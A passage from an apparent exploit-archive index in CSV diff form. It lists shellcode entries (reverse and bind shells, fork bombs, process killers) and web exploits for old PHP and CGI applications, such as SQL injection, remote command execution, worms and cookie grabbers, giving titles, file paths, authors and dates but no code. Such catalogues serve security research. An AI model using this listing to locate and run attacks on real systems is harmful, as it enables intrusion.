bytes)",2017-03-04,"Robert L. Taylor",lin_x86-64,shellcode, -41510,shellcodes/lin_x86-64/41510.nsam,"Linux/x86-64 - Reverse Netcat Shell (127.0.0.1:1234) Polymorphic Shellcode (106 bytes)",2017-03-04,"Robert L. Taylor",lin_x86-64,shellcode, -41581,shellcodes/win_x86/41581.c,"Windows x86 - Hide Console Window Shellcode (182 bytes)",2017-03-11,"Ege Balci",win_x86,shellcode, -41630,shellcodes/lin_x86/41630.asm,"Linux/x86 - exceve /bin/sh Encoded Shellcode (44 Bytes)",2017-03-17,WangYihang,lin_x86,shellcode, -41631,shellcodes/lin_x86/41631.c,"Linux/x86 - Bind TCP /bin/sh Shell (Random TCP Port) Shellcode (44 bytes)",2017-03-17,"Oleg Boytsev",lin_x86,shellcode, -41635,shellcodes/lin_x86/41635.txt,"Linux/x86 - Read /etc/passwd Shellcode (54 Bytes)",2017-03-19,WangYihang,lin_x86,shellcode, -42295,shellcodes/lin_x86/42295.c,"Linux/x86 - Reverse TCP Shell (127.1.1.1:11111/TCP) Null-Free Shellcode (67 bytes)",2013-01-01,"Geyslan G. Bem",lin_x86,shellcode, -41723,shellcodes/lin_x86/41723.c,"Linux/x86 - Reverse TCP /bin/bash Shell (192.168.3.119:54321/TCP) Shellcode (110 bytes)",2017-03-24,JR0ch17,lin_x86,shellcode, -41750,shellcodes/lin_x86-64/41750.txt,"Linux/x86-64 - execve /bin/sh Shellcode (21 Bytes)",2017-03-28,WangYihang,lin_x86-64,shellcode, -41757,shellcodes/lin_x86/41757.txt,"Linux/x86 - execve /bin/sh Shellcode (21 bytes)",2017-03-29,WangYihang,lin_x86,shellcode, -41827,shellcodes/win_x86-64/41827.txt,"Windows 10 x64 - Egghunter Shellcode (45 bytes)",2017-04-06,"Peter Baris",win_x86-64,shellcode, -41883,shellcodes/lin_x86-64/41883.txt,"Linux/x86-64 - execve /bin/sh Shellcode (31 bytes) (2)",2017-04-13,WangYihang,lin_x86-64,shellcode, -41909,shellcodes/lin_x86/41909.c,"Linux/x86 - Egghunter Shellcode (18 bytes)",2017-04-22,phackt_ul,lin_x86,shellcode, -41969,shellcodes/lin_x86/41969.c,"Linux/x86 - Disable ASLR Security Shellcode (80 bytes)",2017-05-08,abatchy17,lin_x86,shellcode, -41970,shellcodes/lin_x86-64/41970.asm,"Linux/x86-64 - Reverse TCP Shell (::1:1472/TCP) (IPv6) Null-Free Shellcode (113 bytes)",2017-05-08,Srakai,lin_x86-64,shellcode, -42016,shellcodes/windows/42016.asm,"Windows x86/x64 - cmd.exe Shellcode (718 bytes)",2017-05-17,"Filippo Bersani",windows,shellcode, -42126,shellcodes/lin_x86-64/42126.c,"Linux/x86-64 - execve /bin/sh Shellcode (31 bytes) (1)",2017-06-05,"Touhid M.Shaikh",lin_x86-64,shellcode, -42177,shellcodes/lin_x86/42177.c,"Linux/x86 - execve /bin/sh + setuid(0) + setgid(0) XOR Encoded Shellcode (66 bytes)",2017-06-15,nullparasite,lin_x86,shellcode, -42179,shellcodes/lin_x86-64/42179.c,"Linux/x86-64 - execve /bin/sh Shellcode (24 bytes)",2017-06-15,m4n3dw0lf,lin_x86-64,shellcode, -42208,shellcodes/lin_x86/42208.nasm,"Linux/x86 - Reverse UDP /bin/sh Shell (127.0.0.1:53/UDP) Shellcode (668 bytes)",2017-06-20,"DONTON Fetenat C",lin_x86,shellcode, -42254,shellcodes/lin_x86/42254.c,"Linux/x86 - Bind TCP /bin/sh Shell (4444/TCP) Null-Free Shellcode (75 bytes)",2017-06-26,wetw0rk,lin_x86,shellcode, -42339,shellcodes/lin_x86-64/42339.c,"Linux/x86-64 - Reverse TCP Shell (192.168.1.8:4444/TCP) Shellcode (104 bytes)",2017-07-19,m4n3dw0lf,lin_x86-64,shellcode, -42428,shellcodes/lin_x86/42428.c,"Linux x86 - execve /bin/sh Shellcode (24 bytes)",2017-08-06,"Touhid M.Shaikh",lin_x86,shellcode, -42485,shellcodes/lin_x86-64/42485.c,"Linux/x86-64 - Reverse TCP Shell (192.168.1.2:4444/TCP) Shellcode (153 bytes)",2017-08-17,"Touhid M.Shaikh",lin_x86-64,shellcode, -42522,shellcodes/lin_x86-64/42522.c,"Linux/x86-64 - Kill All Processes Shellcode (19 bytes)",2017-08-19,"Touhid M.Shaikh",lin_x86-64,shellcode, -42523,shellcodes/lin_x86-64/42523.c,"Linux/x86-64 - Fork Bomb Shellcode (11 bytes)",2017-08-19,"Touhid M.Shaikh",lin_x86-64,shellcode, -42594,shellcodes/lin_x86/42594.c,"Linux/x86 - Fork Bomb Shellcode (9 bytes)",2017-08-30,"Touhid M.Shaikh",lin_x86,shellcode, -42646,shellcodes/arm/42646.c,"Linux/ARM (Raspberry Pi) - Bind TCP /bin/sh Shell (4444/TCP) Shellcode (192 bytes)",2017-09-10,"Andrea Sindoni",arm,shellcode, -42647,shellcodes/arm/42647.c,"Linux/ARM (Raspberry Pi) - Reverse TCP /bin/sh Shell (192.168.0.12:4444/TCP) Shellcode (160 bytes)",2017-09-10,"Andrea Sindoni",arm,shellcode, -42791,shellcodes/lin_x86-64/42791.c,"Linux/x86-64 - mkdir() 'evil' Shellcode (30 bytes)",2017-09-25,"Touhid M.Shaikh",lin_x86-64,shellcode, -42977,shellcodes/lin_x86/42977.c,"Linux/x86 - execve(/bin/sh) Polymorphic Shellcode (30 bytes)",2017-10-12,"Manuel Mancera",lin_x86,shellcode, -42992,shellcodes/win_x86-64/42992.c,"Windows x64 - API Hooking Shellcode (117 bytes)",2017-10-16,"Roziul Hasan Khan Shifat",win_x86-64,shellcode, -6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps, -44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps, -47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps, -53,exploits/cgi/webapps/53.c,"CCBILL CGI - 'ccbillx.c' 'whereami.cgi' Remote Code Execution",2003-07-10,knight420,cgi,webapps, -38772,exploits/hardware/webapps/38772.txt,"ZTE ADSL ZXV10 W300 Modems - Multiple Vulnerabilities",2015-11-20,"Karn Ganeshen",hardware,webapps,80 -137,exploits/php/webapps/137.pl,"phpBB 2.0.6 - 'search_id' SQL Injection / MD5 Hash",2003-12-21,RusH,php,webapps, -138,exploits/php/webapps/138.pl,"PHP-Nuke 6.9 - 'cid' SQL Injection",2003-12-21,RusH,php,webapps, -177,exploits/cgi/webapps/177.pl,"Poll It CGI 2.0 - Multiple Vulnerabilities",2000-11-15,keelis,cgi,webapps, -179,exploits/cgi/webapps/179.c,"News Update 1.1 - Change Admin Password",2000-11-15,morpheus[bd],cgi,webapps, -187,exploits/cgi/webapps/187.pl,"ListMail 112 - Command Execution",2000-11-17,teleh0r,cgi,webapps, -188,exploits/cgi/webapps/188.pl,"UtilMind Mail List 1.7 - Users Can Execute Commands",2000-11-17,teleh0r,cgi,webapps, -242,exploits/cgi/webapps/242.pl,"Fastgraf's whois.cgi - Remote Command Execution",2001-01-12,"Marco van Berkum",cgi,webapps, -289,exploits/cgi/webapps/289.pl,"sendtemp.pl - Read Access to Files",2001-03-04,"Tom Parker",cgi,webapps, -309,exploits/php/webapps/309.c,"phpMyAdmin 2.5.7 - Remote code Injection",2004-07-04,"Nasir Simbolon",php,webapps, -384,exploits/php/webapps/384.txt,"PHP 4.3.7 - 'php-exec-dir' Patch Command Access Restriction Bypass",2004-08-08,VeNoMouS,php,webapps, -406,exploits/php/webapps/406.pl,"phpMyWebhosting - SQL Injection",2004-08-20,"Noam Rathaus",php,webapps, -407,exploits/cgi/webapps/407.txt,"AWStats 5.0 < 6.3 - 'logfile' File Inclusion / Command Execution",2004-08-21,"Johnathan Bat",cgi,webapps, -430,exploits/php/webapps/430.txt,"TorrentTrader 1.0 RC2 - SQL Injection",2004-09-01,aCiDBiTS,php,webapps, -436,exploits/php/webapps/436.txt,"PHP-Nuke 7.4 - Privilege Escalation",2004-09-08,mantra,php,webapps, -464,exploits/cgi/webapps/464.txt,"Turbo Seek - Null Byte Error Discloses Files",2004-09-13,durito,cgi,webapps, -465,exploits/php/webapps/465.pl,"PHP-Nuke - SQL Injection Edit/Save Messages",2004-09-16,iko94,php,webapps, -561,exploits/php/webapps/561.sh,"S9Y Serendipity 0.7-beta1 - SQL Injection (PoC)",2004-09-28,aCiDBiTS,php,webapps, -565,exploits/php/webapps/565.txt,"Silent Storm Portal - Multiple Vulnerabilities",2004-09-30,"CHT Security Research",php,webapps, -570,exploits/php/webapps/570.txt,"WordPress 1.2 - HTTP Splitting",2004-10-10,"Tenable NS",php,webapps, -574,exploits/php/webapps/574.txt,"ocPortal 1.0.3 - Remote File Inclusion",2004-10-13,Exoduks,php,webapps, -630,exploits/php/webapps/630.pl,"UBBCentral UBB.Threads 6.2.x < 6.3x - One Char Brute Force",2004-11-15,RusH,php,webapps, -631,exploits/php/webapps/631.txt,"vBulletin - 'LAST.php' SQL Injection",2004-11-15,anonymous,php,webapps, -635,exploits/php/webapps/635.txt,"MiniBB 1.7f - 'user' SQL Injection",2004-11-16,anonymous,php,webapps, -642,exploits/cgi/webapps/642.pl,"TWiki 20030201 - search.pm Remote Command Execution",2004-11-20,RoMaNSoFt,cgi,webapps, -645,exploits/php/webapps/645.pl,"GFHost PHP GMail - Remote Command Execution",2004-11-21,spabam,php,webapps, -647,exploits/php/webapps/647.pl,"phpBB 2.0.10 - Remote Command Execution",2004-11-22,RusH,php,webapps, -648,exploits/php/webapps/648.pl,"Invision Power Board 2.0.0 < 2.0.2 - SQL Injection",2004-11-22,RusH,php,webapps, -659,exploits/cgi/webapps/659.txt,"Alex Heiphetz Group eZshopper - 'loadpage.cgi' Directory Traversal",2004-11-25,"Zero X",cgi,webapps, -673,exploits/php/webapps/673.pl,"phpBB 2.0.10 - Remote Command Execution (CGI)",2004-12-03,ZzagorR,php,webapps, -676,exploits/php/webapps/676.c,"phpBB 1.0.0/2.0.10 - 'admin_cash.php' Remote Code Execution",2004-12-05,evilrabbi,php,webapps, -697,exploits/php/webapps/697.c,"PHP 4.3.9 + phpBB 2.x - 'Unserialize()' Remote Information Leak",2004-12-17,overdose,php,webapps, -702,exploits/php/webapps/702.pl,"phpBB < 2.0.10 - 'Santy.A Worm' 'highlight' Arbitrary File Upload",2004-12-22,anonymous,php,webapps, -703,exploits/php/webapps/703.pl,"phpMyChat 0.14.5 - Remote Improper File Permissions",2004-12-22,sysbug,php,webapps, -704,exploits/php/webapps/704.pl,"e107 - 'include()' Remote File Upload",2004-12-22,sysbug,php,webapps,80 -720,exploits/php/webapps/720.pl,"Sanity.b - phpBB 2.0.10 Bot Install (AOL/Yahoo Search)",2004-12-25,anonymous,php,webapps, -725,exploits/php/webapps/725.pl,"PHPInclude.Worm - PHP Scripts Automated Arbitrary File Inclusion",2004-12-25,anonymous,php,webapps, -737,exploits/php/webapps/737.txt,"QwikiWiki - Directory Traversal",2005-01-04,Madelman,php,webapps, -740,exploits/php/webapps/740.pl,"phpBB 2.0.10 - 'ssh.D.Worm' Bot Install Altavista",2005-01-04,"Severino Honorato",php,webapps, -754,exploits/php/webapps/754.pl,"ITA Forum 1.49 - SQL Injection",2005-01-13,RusH,php,webapps, -772,exploits/cgi/webapps/772.c,"AWStats 6.0 < 6.2 - configdir Remote Command Execution (C)",2005-01-25,THUNDER,cgi,webapps, -773,exploits/cgi/webapps/773.pl,"AWStats 6.0 < 6.2 - configdir Remote Command Execution (Perl)",2005-01-25,GHC,cgi,webapps, -774,exploits/php/webapps/774.pl,"Siteman 1.1.10 - Remote Administrative Account Addition",2005-01-25,"Noam Rathaus",php,webapps, -786,exploits/php/webapps/786.pl,"LiteForum 2.1.1 - SQL Injection",2005-02-04,RusH,php,webapps, -790,exploits/cgi/webapps/790.pl,"PerlDesk 1.x - SQL Injection",2005-02-05,deluxe89,cgi,webapps, -800,exploits/php/webapps/800.txt,"PostNuke PostWrap Module - Remote File Inclusion / Code Execution",2005-02-08,"ALBANIA SECURITY",php,webapps, -801,exploits/php/webapps/801.c,"PHP-Nuke 7.4 - Admin",2005-02-09,Silentium,php,webapps, -807,exploits/php/webapps/807.txt,"MyPHP Forum 1.0 - SQL Injection",2005-02-10,GHC,php,webapps, -808,exploits/php/webapps/808.txt,"CMScore - SQL Injection",2005-02-10,GHC,php,webapps, -809,exploits/php/webapps/809.txt,"Chipmunk Forums - SQL Injection",2005-02-10,GHC,php,webapps, -814,exploits/php/webapps/814.txt,"MercuryBoard 1.1.1 - SQL Injection",2005-02-12,Zeelock,php,webapps, -818,exploits/php/webapps/818.txt,"vBulletin 3.0.4 - 'forumdisplay.php' Code Execution (1)",2005-02-14,AL3NDALEEB,php,webapps, -820,exploits/php/webapps/820.php,"vBulletin 3.0.4 - 'forumdisplay.php' Code Execution (2)",2005-02-15,AL3NDALEEB,php,webapps, -832,exploits/php/webapps/832.txt,"vBulletin 3.0.6 - PHP Code Injection",2005-02-22,pokley,php,webapps, -840,exploits/cgi/webapps/840.c,"AWStats 5.7 < 6.2 - Multiple Remote s (PoC)",2005-02-24,Silentium,cgi,webapps, -853,exploits/cgi/webapps/853.c,"AWStats 5.7 < 6.2 - Multiple Remote s",2005-03-02,omin0us,cgi,webapps, -857,exploits/php/webapps/857.txt,"PHP Form Mail 2.3 - Arbitrary File Inclusion",2005-03-05,"Filip Groszynski",php,webapps, -858,exploits/php/webapps/858.txt,"phpBB 2.0.12 - Session Handling Authentication Bypass (tutorial)",2005-03-05,PPC,php,webapps, -860,exploits/php/webapps/860.c,"Aztek Forum 4.0 - 'myadmin.php' Database Dumper",2005-03-07,sirius_black,php,webapps, -862,exploits/cgi/webapps/862.txt,"The Includer CGI 1.0 - Remote Command Execution (1)",2005-03-07,"Francisco Alisson",cgi,webapps, -864,exploits/php/webapps/864.txt,"phpWebLog 0.5.3 - Arbitrary File Inclusion",2005-03-07,"Filip Groszynski",php,webapps, -865,exploits/php/webapps/865.txt,"PHP mcNews 1.3 - 'skinfile' Remote File Inclusion",2005-03-07,"Filip Groszynski",php,webapps, -866,exploits/php/webapps/866.c,"paNews 2.0b4 - Remote Admin Creation SQL Injection",2005-03-08,Silentium,php,webapps, -870,exploits/php/webapps/870.txt,"Download Center Lite (DCL) 1.5 - Remote File Inclusion",2005-03-10,"Filip Groszynski",php,webapps, -871,exploits/php/webapps/871.txt,"phpBB 2.0.12 - Session Handling Authentication Bypass",2005-03-11,Ali7,php,webapps, -872,exploits/php/webapps/872.pl,"SocialMPN - Arbitrary File Injection",2005-03-11,y3dips,php,webapps, -873,exploits/php/webapps/873.txt,"phpDEV5 - Remote Default Insecure Users",2005-03-11,Ali7,php,webapps, -881,exploits/php/webapps/881.txt,"ZPanel 2.5 - SQL Injection",2005-03-15,Mikhail,php,webapps, -889,exploits/php/webapps/889.pl,"phpBB 2.0.12 - Change User Rights Authentication Bypass",2005-03-21,Kutas,php,webapps, -892,exploits/php/webapps/892.txt,"phpMyFamily 1.4.0 - Authentication Bypass",2005-03-21,kre0n,php,webapps, -897,exploits/php/webapps/897.cpp,"phpBB 2.0.12 - Change User Rights Authentication Bypass (C)",2005-03-24,str0ke,php,webapps, -901,exploits/php/webapps/901.pl,"PunBB 1.2.2 - Authentication Bypass",2005-03-29,RusH,php,webapps, -907,exploits/php/webapps/907.pl,"phpBB 2.0.13 - 'downloads.php' mod Get Hash",2005-04-02,CereBrums,php,webapps, -910,exploits/php/webapps/910.pl,"phpBB 2.0.13 - 'Calendar Pro' mod Get Hash",2005-04-04,CereBrums,php,webapps, -921,exploits/php/webapps/921.sh,"PHP-Nuke 6.x < 7.6 Top module - SQL Injection",2005-04-07,"Fabrizi Andrea",php,webapps, -922,exploits/cgi/webapps/922.pl,"The Includer CGI 1.0 - Remote Command Execution (2)",2005-04-08,GreenwooD,cgi,webapps, -30090,exploits/php/webapps/30090.txt,"phpPgAdmin 4.1.1 - 'Redirect.php' Cross-Site Scripting",2007-05-25,"Michal Majchrowicz",php,webapps, -923,exploits/cgi/webapps/923.pl,"The Includer CGI 1.0 - Remote Command Execution (3)",2005-04-08,K-C0d3r,cgi,webapps, -925,exploits/asp/webapps/925.txt,"ACNews 1.0 - Authentication Bypass",2005-04-09,LaMeR,asp,webapps, -928,exploits/php/webapps/928.py,"PunBB 1.2.4 - 'id' SQL Injection",2005-04-11,"Stefan Esser",php,webapps, -939,exploits/php/webapps/939.pl,"S9Y Serendipity 0.8beta4 - 'exit.php' SQL Injection",2005-04-13,kre0n,php,webapps, -954,exploits/cgi/webapps/954.pl,"E-Cart 1.1 - 'index.cgi' Remote Command Execution",2005-04-25,z,cgi,webapps, -980,exploits/cgi/webapps/980.pl,"I-Mall Commerce - 'i-mall.cgi' Remote Command Execution",2005-05-04,"Jerome Athias",cgi,webapps, -982,exploits/php/webapps/982.c,"ZeroBoard - Worm Source Code",2005-05-06,anonymous,php,webapps, -989,exploits/php/webapps/989.pl,"PhotoPost - Arbitrary Data Hash",2005-05-13,basher13,php,webapps, -996,exploits/php/webapps/996.pl,"ZPanel 2.5b10 - SQL Injection",2005-05-17,RusH,php,webapps, -1003,exploits/php/webapps/1003.c,"Fusion SBX 1.2 - Remote Command Execution",2005-05-20,Silentium,php,webapps, -1004,exploits/cgi/webapps/1004.php,"WebAPP 0.9.9.2.1 - Remote Command Execution (2)",2005-05-20,Nikyt0x,cgi,webapps, -1005,exploits/cgi/webapps/1005.pl,"WebAPP 0.9.9.2.1 - Remote Command Execution (1)",2005-05-20,Alpha_Programmer,cgi,webapps, -1006,exploits/php/webapps/1006.pl,"Woltlab Burning Board 2.3.1 - 'register.php' SQL Injection",2005-05-20,deluxe89,php,webapps, -1010,exploits/asp/webapps/1010.pl,"Maxwebportal 1.36 - 'Password.asp' Change Password (3) (Perl)",2005-05-26,Alpha_Programmer,asp,webapps, -1011,exploits/asp/webapps/1011.php,"Maxwebportal 1.36 - 'Password.asp' Change Password (2) (PHP)",2005-05-26,mh_p0rtal,asp,webapps, -1012,exploits/asp/webapps/1012.txt,"Maxwebportal 1.36 - 'Password.asp' Change Password (1) (HTML)",2005-05-26,"Soroush Dalili",asp,webapps, -1013,exploits/php/webapps/1013.pl,"Invision Power Board 2.0.3 - 'login.php' SQL Injection",2005-05-26,"Petey Beege",php,webapps, -1014,exploits/php/webapps/1014.txt,"Invision Power Board 2.0.3 - 'login.php' SQL Injection",2005-05-27,"Danica Jones",php,webapps, -1015,exploits/asp/webapps/1015.txt,"Hosting Controller 0.6.1 - Unauthenticated User Registration (3)",2005-05-27,"Soroush Dalili",asp,webapps, -1016,exploits/php/webapps/1016.pl,"phpStat 1.5 - 'setup.php' Authentication Bypass (Perl)",2005-05-30,Alpha_Programmer,php,webapps, -1017,exploits/php/webapps/1017.php,"phpStat 1.5 - 'setup.php' Authentication Bypass (PHP) (1)",2005-05-30,mh_p0rtal,php,webapps, -1018,exploits/php/webapps/1018.php,"phpStat 1.5 - 'setup.php' Authentication Bypass (PHP) (2)",2005-05-30,Nikyt0x,php,webapps, -1020,exploits/php/webapps/1020.c,"ZeroBoard 4.1 - 'preg_replace' Remote Nobody Shell",2005-05-31,n0gada,php,webapps, -1022,exploits/php/webapps/1022.pl,"MyBulletinBoard (MyBB) 1.00 RC4 - 'calendar.php' SQL Injection",2005-05-31,"Alberto Trivero",php,webapps, -1023,exploits/php/webapps/1023.pl,"MyBloggie 2.1.1 < 2.1.2 - SQL Injection",2005-05-31,"Alberto Trivero",php,webapps, -1030,exploits/php/webapps/1030.pl,"PostNuke 0.750 - 'readpmsg.php' SQL Injection",2005-06-05,K-C0d3r,php,webapps, -1031,exploits/php/webapps/1031.pl,"Portail PHP < 1.3 - SQL Injection",2005-06-06,"Alberto Trivero",php,webapps, -1033,exploits/php/webapps/1033.pl,"WordPress 1.5.1.1 - SQL Injection",2005-06-22,"Alberto Trivero",php,webapps, -1036,exploits/php/webapps/1036.php,"Invision Power Board 1.3.1 - 'login.php' SQL Injection",2005-06-08,anonymous,php,webapps, -1039,exploits/cgi/webapps/1039.pl,"Webhints 1.03 - Remote Command Execution (Perl) (1)",2005-06-11,Alpha_Programmer,cgi,webapps, -1040,exploits/cgi/webapps/1040.c,"Webhints 1.03 - Remote Command Execution (C) (2)",2005-06-11,Alpha_Programmer,cgi,webapps, -1041,exploits/cgi/webapps/1041.pl,"Webhints 1.03 - Remote Command Execution (Perl) (3)",2005-06-11,MadSheep,cgi,webapps, -1048,exploits/cgi/webapps/1048.pl,"eXtropia Shopping Cart - 'web_store.cgi' Remote Command Execution",2005-06-15,"Action Spider",cgi,webapps, -1049,exploits/php/webapps/1049.php,"Mambo 4.5.2.1 - Fetch Password Hash",2005-06-15,pokleyzz,php,webapps, -1050,exploits/php/webapps/1050.pl,"PHP Arena 1.1.3 - 'pafiledb.php' Remote Change Password",2005-06-15,Alpha_Programmer,php,webapps, -1051,exploits/php/webapps/1051.pl,"Ultimate PHP Board 1.9.6 GOLD - users.dat Password Decryptor",2005-06-16,"Alberto Trivero",php,webapps, -1052,exploits/php/webapps/1052.php,"Claroline E-Learning 1.6 - Remote Hash SQL Injection (1)",2005-06-17,mh_p0rtal,php,webapps, -1053,exploits/php/webapps/1053.pl,"Claroline E-Learning 1.6 - Remote Hash SQL Injection (2)",2005-06-19,K-C0d3r,php,webapps, -1057,exploits/php/webapps/1057.pl,"Simple Machines Forum (SMF) 1.0.4 - 'modify' SQL Injection",2005-06-21,"James Bercegay",php,webapps, -1058,exploits/php/webapps/1058.pl,"MercuryBoard 1.1.4 - SQL Injection",2005-06-21,RusH,php,webapps, -1059,exploits/php/webapps/1059.pl,"WordPress 1.5.1.1 - 'add new admin' SQL Injection",2005-06-21,RusH,php,webapps, -1060,exploits/php/webapps/1060.pl,"Forum Russian Board 4.2 - Full Command Execution",2005-06-21,RusH,php,webapps, -1061,exploits/php/webapps/1061.pl,"Mambo 4.5.2.1 - SQL Injection",2005-06-21,RusH,php,webapps, -1062,exploits/php/webapps/1062.pl,"Cacti 0.8.6d - Remote Command Execution",2005-06-22,"Alberto Trivero",php,webapps, -1068,exploits/php/webapps/1068.pl,"PHP-Fusion 6.00.105 - Accessible Database Backups Download",2005-06-25,Easyex,php,webapps, -1069,exploits/php/webapps/1069.php,"UBBCentral UBB.Threads < 6.5.2 Beta - 'mailthread.php' SQL Injection",2005-06-25,mh_p0rtal,php,webapps, -1070,exploits/asp/webapps/1070.pl,"ASPNuke 0.80 - 'article.asp' SQL Injection",2005-06-27,mh_p0rtal,asp,webapps, -1071,exploits/asp/webapps/1071.pl,"ASPNuke 0.80 - 'comment_post.asp' SQL Injection",2005-06-27,"Alberto Trivero",asp,webapps, -1076,exploits/php/webapps/1076.py,"phpBB 2.0.15 - 'highlight' PHP Remote Code Execution",2005-06-29,rattle,php,webapps, -1077,exploits/php/webapps/1077.pl,"WordPress 1.5.1.2 - xmlrpc Interface SQL Injection",2005-06-30,"James Bercegay",php,webapps, -1078,exploits/php/webapps/1078.pl,"XML-RPC Library 1.3.0 - 'xmlrpc.php' Remote Code Injection",2005-07-01,ilo--,php,webapps, -1080,exploits/php/webapps/1080.pl,"phpBB 2.0.15 - 'highlight' Database Authentication Details",2005-07-03,SecureD,php,webapps, -1082,exploits/php/webapps/1082.pl,"XOOPS 2.0.11 - 'xmlrpc.php' SQL Injection",2005-07-04,RusH,php,webapps, -1083,exploits/php/webapps/1083.pl,"XML-RPC Library 1.3.0 - 'xmlrpc.php' Remote Command Execution (2)",2005-07-04,dukenn,php,webapps, -1084,exploits/php/webapps/1084.pl,"XML-RPC Library 1.3.0 - 'xmlrpc.php' Remote Command Execution (3)",2005-07-04,"Mike Rifone",php,webapps, -1088,exploits/php/webapps/1088.pl,"Drupal 4.5.3 < 4.6.1 - Comments PHP Injection",2005-07-05,dab,php,webapps, -1095,exploits/php/webapps/1095.txt,"phpBB 2.0.16 - Cross-Site Scripting Remote Cookie Disclosure",2005-07-08,D|ablo,php,webapps, -1097,exploits/php/webapps/1097.txt,"BlogTorrent 0.92 - Remote Password Disclosure",2005-07-11,LazyCrs,php,webapps, -1103,exploits/php/webapps/1103.txt,"phpBB 2.0.16 - Cross-Site Scripting Remote Cookie Disclosure (Cookie Grabber)",2005-07-13,"Sjaak Rake",php,webapps, -1106,exploits/php/webapps/1106.txt,"e107 0.617 - Cross-Site Scripting Remote Cookie Disclosure",2005-07-14,warlord,php,webapps, -1111,exploits/php/webapps/1111.pl,"Open Bulletin Board 1.0.5 - SQL Injection",2005-07-18,RusH,php,webapps, -1112,exploits/asp/webapps/1112.txt,"Hosting Controller 6.1 HotFix 2.2 - Add Domain without Quota",2005-07-18,"Soroush Dalili",asp,webapps, -1113,exploits/php/webapps/1113.pm,"phpBB 2.0.15 - PHP Remote Code Execution (Metasploit)",2005-07-19,str0ke,php,webapps, -1120,exploits/cgi/webapps/1120.pl,"FtpLocate 2.02 - 'current' Remote Command Execution",2005-07-25,newbug,cgi,webapps, -1133,exploits/php/webapps/1133.pm,"vBulletin 3.0.6 - 'template' Command Execution (Metasploit)",2005-08-03,str0ke,php,webapps, -1134,exploits/php/webapps/1134.pl,"MySQL Eventum 1.5.5 - 'login.php' SQL Injection",2005-08-05,"James Bercegay",php,webapps, -1135,exploits/php/webapps/1135.c,"PHP-Fusion 6.0.106 - BBCode IMG Tag Script Injection",2005-08-05,Easyex,php,webapps, -1140,exploits/php/webapps/1140.php,"Flatnuke 2.5.5 - Remote Code Execution",2005-08-08,rgod,php,webapps, -1142,exploits/php/webapps/1142.php,"WordPress 1.5.1.3 - Remote Code Execution",2005-08-09,Kartoffelguru,php,webapps, -1145,exploits/php/webapps/1145.pm,"WordPress 1.5.1.3 - Remote Code Execution (Metasploit)",2005-08-10,str0ke,php,webapps, -1172,exploits/php/webapps/1172.pl,"MyBulletinBoard (MyBB) 1.00 RC4 - 'search.php' SQL Injection",2005-08-22,Alpha_Programmer,php,webapps, -1189,exploits/php/webapps/1189.c,"vBulletin 3.0.8 - Accessible Database Backup Searcher (3)",2005-08-31,str0ke,php,webapps, -1191,exploits/php/webapps/1191.pl,"Simple PHP Blog 0.4.0 - Multiple Remote s",2005-09-01,"Kenneth Belva",php,webapps, -1194,exploits/cgi/webapps/1194.c,"man2web 0.88 - Multiple Remote Command Executions (2)",2005-09-04,tracewar,cgi,webapps, -1200,exploits/php/webapps/1200.php,"PBLang 4.65 - Remote Command Execution (1)",2005-09-07,rgod,php,webapps, -1202,exploits/php/webapps/1202.php,"PBLang 4.65 - Remote Command Execution (2)",2005-09-07,RusH,php,webapps, -1207,exploits/php/webapps/1207.php,"Class-1 Forum 0.24.4 - Remote Code Execution",2005-09-09,rgod,php,webapps, -1208,exploits/php/webapps/1208.pl,"phpMyFamily 1.4.0 - SQL Injection",2005-03-27,basher13,php,webapps, -1211,exploits/php/webapps/1211.pl,"PhpTagCool 1.0.3 - SQL Injection",2005-09-11,Megabyte,php,webapps, -1214,exploits/php/webapps/1214.php,"AzDGDatingLite 2.1.3 - Remote Code Execution",2005-09-13,rgod,php,webapps, -1217,exploits/php/webapps/1217.pl,"phpWebSite 0.10.0 - 'module' SQL Injection",2005-09-15,RusH,php,webapps, -1219,exploits/php/webapps/1219.c,"PHP-Nuke 7.8 - 'modules.php' SQL Injection",2005-09-16,RusH,php,webapps, -1221,exploits/php/webapps/1221.php,"CuteNews 1.4.0 - Shell Injection / Remote Command Execution",2005-09-17,rgod,php,webapps, -1225,exploits/php/webapps/1225.php,"My Little Forum 1.5 - 'SearchString' SQL Injection",2005-09-22,rgod,php,webapps, -1226,exploits/php/webapps/1226.php,"phpMyFAQ 1.5.1 - 'User-Agent' Remote Shell Injection",2005-09-23,rgod,php,webapps, -1227,exploits/php/webapps/1227.php,"MailGust 1.9 - Board Takeover SQL Injection",2005-09-24,rgod,php,webapps, -1236,exploits/cgi/webapps/1236.pm,"Barracuda Spam Firewall < 3.1.18 - Command Execution (Metasploit)",2005-09-27,"Nicolas Gregoire",cgi,webapps, -1237,exploits/php/webapps/1237.php,"PHP-Fusion 6.00.109 - 'msg_send' SQL Injection",2005-09-28,rgod,php,webapps, -1240,exploits/php/webapps/1240.php,"Utopia News Pro 1.1.3 - 'news.php' SQL Injection",2005-10-06,rgod,php,webapps, -1241,exploits/php/webapps/1241.php,"Cyphor 0.19 - Board Takeover SQL Injection",2005-10-08,rgod,php,webapps, -1244,exploits/php/webapps/1244.pl,"phpMyAdmin 2.6.4-pl1 - Directory Traversal",2005-10-10,cXIb8O3,php,webapps, -1245,exploits/php/webapps/1245.php,"versatileBulletinBoard 1.00 RC2 - 'board takeover' SQL Injection",2005-10-10,rgod,php,webapps, -1250,exploits/php/webapps/1250.php,"w-Agora 4.2.0 - 'quicklist.php' Remote Code Execution",2005-10-14,rgod,php,webapps, -1252,exploits/asp/webapps/1252.html,"MuOnline Loopholes Web Server - 'pkok.asp' SQL Injection",2005-10-15,nukedx,asp,webapps, -1270,exploits/php/webapps/1270.php,"PHP-Nuke 7.8 - SQL Injection / Remote Command Execution",2005-10-23,rgod,php,webapps, -1273,exploits/php/webapps/1273.pl,"TClanPortal 1.1.3 - 'id' SQL Injection",2005-10-26,Devil-00,php,webapps, -1278,exploits/php/webapps/1278.pl,"Subdreamer 2.2.1 - SQL Injection / Command Execution",2005-10-31,RusH,php,webapps, -1280,exploits/php/webapps/1280.pl,"VuBB Forum RC1 - 'm' SQL Injection",2005-11-02,Devil-00,php,webapps, -1289,exploits/php/webapps/1289.php,"CuteNews 1.4.1 - Shell Injection / Remote Command Execution",2005-11-03,rgod,php,webapps, -1296,exploits/php/webapps/1296.txt,"ibProArcade 2.x - module 